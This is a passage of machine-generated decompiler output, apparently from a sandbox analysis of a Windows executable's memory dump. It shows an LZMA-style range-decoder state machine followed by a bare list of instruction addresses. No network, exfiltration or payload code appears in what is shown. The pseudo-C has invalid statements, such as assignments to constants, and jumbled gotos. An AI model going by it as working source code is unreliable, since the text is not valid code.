                                                													L48:
                                                													__eflags = __ebx - 0x100;
                                                													if(__ebx >= 0x100) {
                                                														break;
                                                													}
                                                													__eax =  *(__ebp - 0x58);
                                                													__edx = __ebx + __ebx;
                                                													__ecx =  *(__ebp - 0x10);
                                                													__esi = __edx + __eax;
                                                													__ecx =  *(__ebp - 0x10) >> 0xb;
                                                													__ax =  *__esi;
                                                													 *(__ebp - 0x54) = __esi;
                                                													__edi = __ax & 0x0000ffff;
                                                													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                													__eflags =  *(__ebp - 0xc) - __ecx;
                                                													if( *(__ebp - 0xc) >= __ecx) {
                                                														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                														__cx = __ax;
                                                														_t170 = __edx + 1; // 0x1
                                                														__ebx = _t170;
                                                														__cx = __ax >> 5;
                                                														__eflags = __eax;
                                                														 *__esi = __ax;
                                                													} else {
                                                														 *(__ebp - 0x10) = __ecx;
                                                														0x800 = 0x800 - __edi;
                                                														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                														__ebx = __ebx + __ebx;
                                                														 *__esi = __cx;
                                                													}
                                                													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                													 *(__ebp - 0x44) = __ebx;
                                                													if( *(__ebp - 0x10) >= 0x1000000) {
                                                														continue;
                                                													} else {
                                                														goto L46;
                                                													}
                                                												}
                                                												L54:
                                                												_t173 = __ebp - 0x34;
                                                												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                												__eflags =  *_t173;
                                                												goto L55;
                                                											case 0xf:
                                                												L58:
                                                												__eflags =  *(__ebp - 0x6c);
                                                												if( *(__ebp - 0x6c) == 0) {
                                                													 *(__ebp - 0x88) = 0xf;
                                                													goto L170;
                                                												}
                                                												__ecx =  *(__ebp - 0x70);
                                                												__eax =  *(__ebp - 0xc);
                                                												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                												_t203 = __ebp - 0x70;
                                                												 *_t203 =  *(__ebp - 0x70) + 1;
                                                												__eflags =  *_t203;
                                                												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                												L60:
                                                												__eflags = __ebx - 0x100;
                                                												if(__ebx >= 0x100) {
                                                													L55:
                                                													__al =  *(__ebp - 0x44);
                                                													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                													goto L56;
                                                												}
                                                												L61:
                                                												__eax =  *(__ebp - 0x58);
                                                												__edx = __ebx + __ebx;
                                                												__ecx =  *(__ebp - 0x10);
                                                												__esi = __edx + __eax;
                                                												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                												__ax =  *__esi;
                                                												 *(__ebp - 0x54) = __esi;
                                                												__edi = __ax & 0x0000ffff;
                                                												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                												__eflags =  *(__ebp - 0xc) - __ecx;
                                                												if( *(__ebp - 0xc) >= __ecx) {
                                                													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                													__cx = __ax;
                                                													_t217 = __edx + 1; // 0x1
                                                													__ebx = _t217;
                                                													__cx = __ax >> 5;
                                                													__eflags = __eax;
                                                													 *__esi = __ax;
                                                												} else {
                                                													 *(__ebp - 0x10) = __ecx;
                                                													0x800 = 0x800 - __edi;
                                                													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                													__ebx = __ebx + __ebx;
                                                													 *__esi = __cx;
                                                												}
                                                												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                												 *(__ebp - 0x44) = __ebx;
                                                												if( *(__ebp - 0x10) >= 0x1000000) {
                                                													goto L60;
                                                												} else {
                                                													goto L58;
                                                												}
                                                											case 0x10:
                                                												L109:
                                                												__eflags =  *(__ebp - 0x6c);
                                                												if( *(__ebp - 0x6c) == 0) {
                                                													 *(__ebp - 0x88) = 0x10;
                                                													goto L170;
                                                												}
                                                												__ecx =  *(__ebp - 0x70);
                                                												__eax =  *(__ebp - 0xc);
                                                												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                												_t365 = __ebp - 0x70;
                                                												 *_t365 =  *(__ebp - 0x70) + 1;
                                                												__eflags =  *_t365;
                                                												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                												goto L111;
                                                											case 0x11:
                                                												L68:
                                                												_t614 =  *(_t621 - 0x58);
                                                												 *(_t621 - 0x84) = 0x12;
                                                												while(1) {
                                                													L132:
                                                													 *(_t621 - 0x54) = _t614;
                                                													goto L133;
                                                												}
                                                											case 0x12:
                                                												__eflags =  *(__ebp - 0x40);
                                                												if( *(__ebp - 0x40) != 0) {
                                                													__eax =  *(__ebp - 0x58);
                                                													 *(__ebp - 0x84) = 0x13;
                                                													__esi =  *(__ebp - 0x58) + 2;
                                                													while(1) {
                                                														L132:
                                                														 *(_t621 - 0x54) = _t614;
                                                														goto L133;
                                                													}
                                                												}
                                                												__eax =  *(__ebp - 0x4c);
                                                												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                												__ecx =  *(__ebp - 0x58);
                                                												__eax =  *(__ebp - 0x4c) << 4;
                                                												__eflags = __eax;
                                                												__eax =  *(__ebp - 0x58) + __eax + 4;
                                                												goto L130;
                                                											case 0x13:
                                                												__eflags =  *(__ebp - 0x40);
                                                												if( *(__ebp - 0x40) != 0) {
                                                													_t469 = __ebp - 0x58;
                                                													 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                													__eflags =  *_t469;
                                                													 *(__ebp - 0x30) = 0x10;
                                                													 *(__ebp - 0x40) = 8;
                                                													L144:
                                                													 *(__ebp - 0x7c) = 0x14;
                                                													goto L145;
                                                												}
                                                												__eax =  *(__ebp - 0x4c);
                                                												__ecx =  *(__ebp - 0x58);
                                                												__eax =  *(__ebp - 0x4c) << 4;
                                                												 *(__ebp - 0x30) = 8;
                                                												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                												L130:
                                                												 *(__ebp - 0x58) = __eax;
                                                												 *(__ebp - 0x40) = 3;
                                                												goto L144;
                                                											case 0x14:
                                                												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                												__eax =  *(__ebp - 0x80);
                                                												 *(_t621 - 0x88) = _t542;
                                                												goto L1;
                                                											case 0x15:
                                                												__eax = 0;
                                                												__eflags =  *(__ebp - 0x38) - 7;
                                                												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                												__al = __al & 0x000000fd;
                                                												__eax = (__eflags >= 0) - 1 + 0xb;
                                                												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                												goto L120;
                                                											case 0x16:
                                                												__eax =  *(__ebp - 0x30);
                                                												__eflags = __eax - 4;
                                                												if(__eax >= 4) {
                                                													_push(3);
                                                													_pop(__eax);
                                                												}
                                                												__ecx =  *(__ebp - 4);
                                                												 *(__ebp - 0x40) = 6;
                                                												__eax = __eax << 7;
                                                												 *(__ebp - 0x7c) = 0x19;
                                                												 *(__ebp - 0x58) = __eax;
                                                												goto L145;
                                                											case 0x17:
                                                												L145:
                                                												__eax =  *(__ebp - 0x40);
                                                												 *(__ebp - 0x50) = 1;
                                                												 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                												goto L149;
                                                											case 0x18:
                                                												L146:
                                                												__eflags =  *(__ebp - 0x6c);
                                                												if( *(__ebp - 0x6c) == 0) {
                                                													 *(__ebp - 0x88) = 0x18;
                                                													goto L170;
                                                												}
                                                												__ecx =  *(__ebp - 0x70);
                                                												__eax =  *(__ebp - 0xc);
                                                												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                												_t484 = __ebp - 0x70;
                                                												 *_t484 =  *(__ebp - 0x70) + 1;
                                                												__eflags =  *_t484;
                                                												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                												L148:
                                                												_t487 = __ebp - 0x48;
                                                												 *_t487 =  *(__ebp - 0x48) - 1;
                                                												__eflags =  *_t487;
                                                												L149:
                                                												__eflags =  *(__ebp - 0x48);
                                                												if( *(__ebp - 0x48) <= 0) {
                                                													__ecx =  *(__ebp - 0x40);
                                                													__ebx =  *(__ebp - 0x50);
                                                													0 = 1;
                                                													__eax = 1 << __cl;
                                                													__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                													__eax =  *(__ebp - 0x7c);
                                                													 *(__ebp - 0x44) = __ebx;
                                                													while(1) {
                                                														 *(_t621 - 0x88) = _t542;
                                                														goto L1;
                                                													}
                                                												}
                                                												__eax =  *(__ebp - 0x50);
                                                												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                												__eax =  *(__ebp - 0x58);
                                                												__esi = __edx + __eax;
                                                												 *(__ebp - 0x54) = __esi;
                                                												__ax =  *__esi;
                                                												__edi = __ax & 0x0000ffff;
                                                												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                												__eflags =  *(__ebp - 0xc) - __ecx;
                                                												if( *(__ebp - 0xc) >= __ecx) {
                                                													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                													__cx = __ax;
                                                													__cx = __ax >> 5;
                                                													__eax = __eax - __ecx;
                                                													__edx = __edx + 1;
                                                													__eflags = __edx;
                                                													 *__esi = __ax;
                                                													 *(__ebp - 0x50) = __edx;
                                                												} else {
                                                													 *(__ebp - 0x10) = __ecx;
                                                													0x800 = 0x800 - __edi;
                                                													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                													 *__esi = __cx;
                                                												}
                                                												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                												if( *(__ebp - 0x10) >= 0x1000000) {
                                                													goto L148;
                                                												} else {
                                                													goto L146;
                                                												}
                                                											case 0x19:
                                                												__eflags = __ebx - 4;
                                                												if(__ebx < 4) {
                                                													 *(__ebp - 0x2c) = __ebx;
                                                													L119:
                                                													_t393 = __ebp - 0x2c;
                                                													 *_t393 =  *(__ebp - 0x2c) + 1;
                                                													__eflags =  *_t393;
                                                													L120:
                                                													__eax =  *(__ebp - 0x2c);
                                                													__eflags = __eax;
                                                													if(__eax == 0) {
                                                														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                														goto L170;
                                                													}
                                                													__eflags = __eax -  *(__ebp - 0x60);
                                                													if(__eax >  *(__ebp - 0x60)) {
                                                														goto L171;
                                                													}
                                                													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                													__eax =  *(__ebp - 0x30);
                                                													_t400 = __ebp - 0x60;
                                                													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                													__eflags =  *_t400;
                                                													goto L123;
                                                												}
                                                												__ecx = __ebx;
                                                												__eax = __ebx;
                                                												__ecx = __ebx >> 1;
                                                												__eax = __ebx & 0x00000001;
                                                												__ecx = (__ebx >> 1) - 1;
                                                												__al = __al | 0x00000002;
                                                												__eax = (__ebx & 0x00000001) << __cl;
                                                												__eflags = __ebx - 0xe;
                                                												 *(__ebp - 0x2c) = __eax;
                                                												if(__ebx >= 0xe) {
                                                													__ebx = 0;
                                                													 *(__ebp - 0x48) = __ecx;
                                                													L102:
                                                													__eflags =  *(__ebp - 0x48);
                                                													if( *(__ebp - 0x48) <= 0) {
                                                														__eax = __eax + __ebx;
                                                														 *(__ebp - 0x40) = 4;
                                                														 *(__ebp - 0x2c) = __eax;
                                                														__eax =  *(__ebp - 4);
                                                														__eax =  *(__ebp - 4) + 0x644;
                                                														__eflags = __eax;
                                                														L108:
                                                														__ebx = 0;
                                                														 *(__ebp - 0x58) = __eax;
                                                														 *(__ebp - 0x50) = 1;
                                                														 *(__ebp - 0x44) = 0;
                                                														 *(__ebp - 0x48) = 0;
                                                														L112:
                                                														__eax =  *(__ebp - 0x40);
                                                														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                															_t391 = __ebp - 0x2c;
                                                															 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                															__eflags =  *_t391;
                                                															goto L119;
                                                														}
                                                														__eax =  *(__ebp - 0x50);
                                                														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                														__eax =  *(__ebp - 0x58);
                                                														__esi = __edi + __eax;
                                                														 *(__ebp - 0x54) = __esi;
                                                														__ax =  *__esi;
                                                														__ecx = __ax & 0x0000ffff;
                                                														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                														__eflags =  *(__ebp - 0xc) - __edx;
                                                														if( *(__ebp - 0xc) >= __edx) {
                                                															__ecx = 0;
                                                															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                															__ecx = 1;
                                                															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                															__ebx = 1;
                                                															__ecx =  *(__ebp - 0x48);
                                                															__ebx = 1 << __cl;
                                                															__ecx = 1 << __cl;
                                                															__ebx =  *(__ebp - 0x44);
                                                															__ebx =  *(__ebp - 0x44) | __ecx;
                                                															__cx = __ax;
                                                															__cx = __ax >> 5;
                                                															__eax = __eax - __ecx;
                                                															__edi = __edi + 1;
                                                															__eflags = __edi;
                                                															 *(__ebp - 0x44) = __ebx;
                                                															 *__esi = __ax;
                                                															 *(__ebp - 0x50) = __edi;
                                                														} else {
                                                															 *(__ebp - 0x10) = __edx;
                                                															0x800 = 0x800 - __ecx;
                                                															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                															 *__esi = __dx;
                                                														}
                                                														__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                														if( *(__ebp - 0x10) >= 0x1000000) {
                                                															L111:
                                                															_t368 = __ebp - 0x48;
                                                															 *_t368 =  *(__ebp - 0x48) + 1;
                                                															__eflags =  *_t368;
                                                															goto L112;
                                                														} else {
                                                															goto L109;
                                                														}
                                                													}
                                                													__ecx =  *(__ebp - 0xc);
                                                													__ebx = __ebx + __ebx;
                                                													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                													 *(__ebp - 0x44) = __ebx;
                                                													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                														__ecx =  *(__ebp - 0x10);
                                                														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                														__ebx = __ebx | 0x00000001;
                                                														__eflags = __ebx;
                                                														 *(__ebp - 0x44) = __ebx;
                                                													}
                                                													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                													if( *(__ebp - 0x10) >= 0x1000000) {
                                                														L101:
                                                														_t338 = __ebp - 0x48;
                                                														 *_t338 =  *(__ebp - 0x48) - 1;
                                                														__eflags =  *_t338;
                                                														goto L102;
                                                													} else {
                                                														goto L99;
                                                													}
                                                												}
                                                												__edx =  *(__ebp - 4);
                                                												__eax = __eax - __ebx;
                                                												 *(__ebp - 0x40) = __ecx;
                                                												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                												goto L108;
                                                											case 0x1a:
                                                												L56:
                                                												__eflags =  *(__ebp - 0x64);
                                                												if( *(__ebp - 0x64) == 0) {
                                                													 *(__ebp - 0x88) = 0x1a;
                                                													goto L170;
                                                												}
                                                												__ecx =  *(__ebp - 0x68);
                                                												__al =  *(__ebp - 0x5c);
                                                												__edx =  *(__ebp - 8);
                                                												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                												 *( *(__ebp - 0x68)) = __al;
                                                												__ecx =  *(__ebp - 0x14);
                                                												 *(__ecx +  *(__ebp - 8)) = __al;
                                                												__eax = __ecx + 1;
                                                												__edx = 0;
                                                												_t192 = __eax %  *(__ebp - 0x74);
                                                												__eax = __eax /  *(__ebp - 0x74);
                                                												__edx = _t192;
                                                												goto L79;
                                                											case 0x1b:
                                                												L75:
                                                												__eflags =  *(__ebp - 0x64);
                                                												if( *(__ebp - 0x64) == 0) {
                                                													 *(__ebp - 0x88) = 0x1b;
                                                													goto L170;
                                                												}
                                                												__eax =  *(__ebp - 0x14);
                                                												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                												__eflags = __eax -  *(__ebp - 0x74);
                                                												if(__eax >=  *(__ebp - 0x74)) {
                                                													__eax = __eax +  *(__ebp - 0x74);
                                                													__eflags = __eax;
                                                												}
                                                												__edx =  *(__ebp - 8);
                                                												__cl =  *(__eax + __edx);
                                                												__eax =  *(__ebp - 0x14);
                                                												 *(__ebp - 0x5c) = __cl;
                                                												 *(__eax + __edx) = __cl;
                                                												__eax = __eax + 1;
                                                												__edx = 0;
                                                												_t274 = __eax %  *(__ebp - 0x74);
                                                												__eax = __eax /  *(__ebp - 0x74);
                                                												__edx = _t274;
                                                												__eax =  *(__ebp - 0x68);
                                                												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                												_t283 = __ebp - 0x64;
                                                												 *_t283 =  *(__ebp - 0x64) - 1;
                                                												__eflags =  *_t283;
                                                												 *( *(__ebp - 0x68)) = __cl;
                                                												L79:
                                                												 *(__ebp - 0x14) = __edx;
                                                												goto L80;
                                                											case 0x1c:
                                                												while(1) {
                                                													L123:
                                                													__eflags =  *(__ebp - 0x64);
                                                													if( *(__ebp - 0x64) == 0) {
                                                														break;
                                                													}
                                                													__eax =  *(__ebp - 0x14);
                                                													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                													__eflags = __eax -  *(__ebp - 0x74);
                                                													if(__eax >=  *(__ebp - 0x74)) {
                                                														__eax = __eax +  *(__ebp - 0x74);
                                                														__eflags = __eax;
                                                													}
                                                													__edx =  *(__ebp - 8);
                                                													__cl =  *(__eax + __edx);
                                                													__eax =  *(__ebp - 0x14);
                                                													 *(__ebp - 0x5c) = __cl;
                                                													 *(__eax + __edx) = __cl;
                                                													__eax = __eax + 1;
                                                													__edx = 0;
                                                													_t414 = __eax %  *(__ebp - 0x74);
                                                													__eax = __eax /  *(__ebp - 0x74);
                                                													__edx = _t414;
                                                													__eax =  *(__ebp - 0x68);
                                                													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                													__eflags =  *(__ebp - 0x30);
                                                													 *( *(__ebp - 0x68)) = __cl;
                                                													 *(__ebp - 0x14) = _t414;
                                                													if( *(__ebp - 0x30) > 0) {
                                                														continue;
                                                													} else {
                                                														L80:
                                                														 *(__ebp - 0x88) = 2;
                                                														goto L1;
                                                													}
                                                												}
                                                												 *(__ebp - 0x88) = 0x1c;
                                                												goto L170;
                                                										}
                                                									}
                                                									L171:
                                                									_t544 = _t543 | 0xffffffff;
                                                									goto L172;
                                                								}
                                                							}
                                                						}
                                                					}
                                                					goto L1;
                                                				}
                                                			}














                                                0x00000000
                                                0x004061ae
                                                0x004061b4
                                                0x004061b7
                                                0x004061c4
                                                0x004061cc
                                                0x00000000
                                                0x00000000
                                                0x00406183
                                                0x00406183
                                                0x00406187
                                                0x004069d2
                                                0x00000000
                                                0x004069d2
                                                0x00406193
                                                0x0040619e
                                                0x0040619e
                                                0x0040619e
                                                0x004061a1
                                                0x004061a4
                                                0x004061a7
                                                0x004061ac
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406843
                                                0x00406843
                                                0x00406849
                                                0x0040684f
                                                0x00406855
                                                0x0040686f
                                                0x00406872
                                                0x00406878
                                                0x00406883
                                                0x00406885
                                                0x00406857
                                                0x00406857
                                                0x00406866
                                                0x0040686a
                                                0x0040686a
                                                0x0040688f
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004061d4
                                                0x004061d6
                                                0x004061d9
                                                0x0040624a
                                                0x0040624d
                                                0x00406250
                                                0x00406257
                                                0x00406261
                                                0x00406840
                                                0x00406840
                                                0x00000000
                                                0x00406840
                                                0x004061db
                                                0x004061df
                                                0x004061e2
                                                0x004061e4
                                                0x004061e7
                                                0x004061ea
                                                0x004061ec
                                                0x004061ef
                                                0x004061f1
                                                0x004061f6
                                                0x004061f9
                                                0x004061fc
                                                0x00406200
                                                0x00406207
                                                0x0040620a
                                                0x00406211
                                                0x00406215
                                                0x0040621d
                                                0x0040621d
                                                0x0040621d
                                                0x00406217
                                                0x00406217
                                                0x00406217
                                                0x0040620c
                                                0x0040620c
                                                0x0040620c
                                                0x00406221
                                                0x00406224
                                                0x00406242
                                                0x00406244
                                                0x00000000
                                                0x00406226
                                                0x00406226
                                                0x00406229
                                                0x0040622c
                                                0x0040622f
                                                0x00406231
                                                0x00406231
                                                0x00406231
                                                0x00406234
                                                0x00406237
                                                0x00406239
                                                0x0040623a
                                                0x0040623d
                                                0x00000000
                                                0x0040623d
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004064dd
                                                0x004064e1
                                                0x00406504
                                                0x00406507
                                                0x0040650a
                                                0x00406514
                                                0x004064e3
                                                0x004064e3
                                                0x004064e6
                                                0x004064e9
                                                0x004064ec
                                                0x004064f9
                                                0x004064fc
                                                0x004064fc
                                                0x00406840
                                                0x00406840
                                                0x00406840
                                                0x00000000
                                                0x00406840
                                                0x00000000
                                                0x00406520
                                                0x00406524
                                                0x00000000
                                                0x00000000
                                                0x0040652a
                                                0x0040652e
                                                0x00000000
                                                0x00000000
                                                0x00406534
                                                0x00406536
                                                0x0040653a
                                                0x0040653a
                                                0x0040653d
                                                0x00406541
                                                0x00000000
                                                0x00000000
                                                0x00406591
                                                0x00406595
                                                0x0040659c
                                                0x0040659f
                                                0x004065a2
                                                0x004065ac
                                                0x00406840
                                                0x00406840
                                                0x00406840
                                                0x00000000
                                                0x00406840
                                                0x00406840
                                                0x00406597
                                                0x00000000
                                                0x00000000
                                                0x004065b8
                                                0x004065bc
                                                0x004065c3
                                                0x004065c6
                                                0x004065c9
                                                0x004065be
                                                0x004065be
                                                0x004065be
                                                0x004065cc
                                                0x004065cf
                                                0x004065d2
                                                0x004065d2
                                                0x004065d5
                                                0x004065d8
                                                0x004065db
                                                0x004065db
                                                0x004065de
                                                0x004065e5
                                                0x004065ea
                                                0x00000000
                                                0x00000000
                                                0x00406678
                                                0x00406678
                                                0x0040667c
                                                0x00406a1a
                                                0x00000000
                                                0x00406a1a
                                                0x00406682
                                                0x00406685
                                                0x00406688
                                                0x0040668c
                                                0x0040668f
                                                0x00406695
                                                0x00406697
                                                0x00406697
                                                0x00406697
                                                0x0040669a
                                                0x0040669d
                                                0x00000000
                                                0x00000000
                                                0x0040626d
                                                0x0040626d
                                                0x00406271
                                                0x004069de
                                                0x00000000
                                                0x004069de
                                                0x00406277
                                                0x0040627a
                                                0x0040627d
                                                0x00406281
                                                0x00406284
                                                0x0040628a
                                                0x0040628c
                                                0x0040628c
                                                0x0040628c
                                                0x0040628f
                                                0x00406292
                                                0x00406292
                                                0x00406295
                                                0x00406298
                                                0x00000000
                                                0x00000000
                                                0x0040629e
                                                0x004062a4
                                                0x00000000
                                                0x00000000
                                                0x004062aa
                                                0x004062aa
                                                0x004062ae
                                                0x004062b1
                                                0x004062b4
                                                0x004062b7
                                                0x004062ba
                                                0x004062bb
                                                0x004062be
                                                0x004062c0
                                                0x004062c6
                                                0x004062c9
                                                0x004062cc
                                                0x004062cf
                                                0x004062d2
                                                0x004062d5
                                                0x004062d8
                                                0x004062f4
                                                0x004062f7
                                                0x004062fa
                                                0x004062fd
                                                0x00406304
                                                0x00406308
                                                0x0040630a
                                                0x0040630e
                                                0x004062da
                                                0x004062da
                                                0x004062de
                                                0x004062e6
                                                0x004062eb
                                                0x004062ed
                                                0x004062ef
                                                0x004062ef
                                                0x00406311
                                                0x00406318
                                                0x0040631b
                                                0x00000000
                                                0x00406321
                                                0x00000000
                                                0x00406321
                                                0x00000000
                                                0x00406326
                                                0x00406326
                                                0x0040632a
                                                0x004069ea
                                                0x00000000
                                                0x004069ea
                                                0x00406330
                                                0x00406333
                                                0x00406336
                                                0x0040633a
                                                0x0040633d
                                                0x00406343
                                                0x00406345
                                                0x00406345
                                                0x00406345
                                                0x00406348
                                                0x0040634b
                                                0x0040634b
                                                0x0040634b
                                                0x00406351
                                                0x00000000
                                                0x00000000
                                                0x00406353
                                                0x00406356
                                                0x00406359
                                                0x0040635c
                                                0x0040635f
                                                0x00406362
                                                0x00406365
                                                0x00406368
                                                0x0040636b
                                                0x0040636e
                                                0x00406371
                                                0x00406389
                                                0x0040638c
                                                0x0040638f
                                                0x00406392
                                                0x00406392
                                                0x00406395
                                                0x00406399
                                                0x0040639b
                                                0x00406373
                                                0x00406373
                                                0x0040637b
                                                0x00406380
                                                0x00406382
                                                0x00406384
                                                0x00406384
                                                0x0040639e
                                                0x004063a5
                                                0x004063a8
                                                0x00000000
                                                0x004063aa
                                                0x00000000
                                                0x004063aa
                                                0x004063a8
                                                0x004063af
                                                0x004063af
                                                0x004063af
                                                0x004063af
                                                0x00000000
                                                0x00000000
                                                0x004063ea
                                                0x004063ea
                                                0x004063ee
                                                0x004069f6
                                                0x00000000
                                                0x004069f6
                                                0x004063f4
                                                0x004063f7
                                                0x004063fa
                                                0x004063fe
                                                0x00406401
                                                0x00406407
                                                0x00406409
                                                0x00406409
                                                0x00406409
                                                0x0040640c
                                                0x0040640f
                                                0x0040640f
                                                0x00406415
                                                0x004063b3
                                                0x004063b3
                                                0x004063b6
                                                0x00000000
                                                0x004063b6
                                                0x00406417
                                                0x00406417
                                                0x0040641a
                                                0x0040641d
                                                0x00406420
                                                0x00406423
                                                0x00406426
                                                0x00406429
                                                0x0040642c
                                                0x0040642f
                                                0x00406432
                                                0x00406435
                                                0x0040644d
                                                0x00406450
                                                0x00406453
                                                0x00406456
                                                0x00406456
                                                0x00406459
                                                0x0040645d
                                                0x0040645f
                                                0x00406437
                                                0x00406437
                                                0x0040643f
                                                0x00406444
                                                0x00406446
                                                0x00406448
                                                0x00406448
                                                0x00406462
                                                0x00406469
                                                0x0040646c
                                                0x00000000
                                                0x0040646e
                                                0x00000000
                                                0x0040646e
                                                0x00000000
                                                0x004066fb
                                                0x004066fb
                                                0x004066ff
                                                0x00406a26
                                                0x00000000
                                                0x00406a26
                                                0x00406705
                                                0x00406708
                                                0x0040670b
                                                0x0040670f
                                                0x00406712
                                                0x00406718
                                                0x0040671a
                                                0x0040671a
                                                0x0040671a
                                                0x0040671d
                                                0x00000000
                                                0x00000000
                                                0x004064cb
                                                0x004064cb
                                                0x004064ce
                                                0x00406840
                                                0x00406840
                                                0x00406840
                                                0x00000000
                                                0x00406840
                                                0x00000000
                                                0x0040680a
                                                0x0040680e
                                                0x00406830
                                                0x00406833
                                                0x0040683d
                                                0x00406840
                                                0x00406840
                                                0x00406840
                                                0x00000000
                                                0x00406840
                                                0x00406840
                                                0x00406810
                                                0x00406813
                                                0x00406817
                                                0x0040681a
                                                0x0040681a
                                                0x0040681d
                                                0x00000000
                                                0x00000000
                                                0x004068c7
                                                0x004068cb
                                                0x004068e9
                                                0x004068e9
                                                0x004068e9
                                                0x004068f0
                                                0x004068f7
                                                0x004068fe
                                                0x004068fe
                                                0x00000000
                                                0x004068fe
                                                0x004068cd
                                                0x004068d0
                                                0x004068d3
                                                0x004068d6
                                                0x004068dd
                                                0x00406821
                                                0x00406821
                                                0x00406824
                                                0x00000000
                                                0x00000000
                                                0x004069b8
                                                0x004069bb
                                                0x004068bc
                                                0x00000000
                                                0x00000000
                                                0x004065f2
                                                0x004065f4
                                                0x004065fb
                                                0x004065fc
                                                0x004065fe
                                                0x00406601
                                                0x00000000
                                                0x00000000
                                                0x00406609
                                                0x0040660c
                                                0x0040660f
                                                0x00406611
                                                0x00406613
                                                0x00406613
                                                0x00406614
                                                0x00406617

                                                Memory Dump Source
                                                • Source File: 00000004.00000002.493663175.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
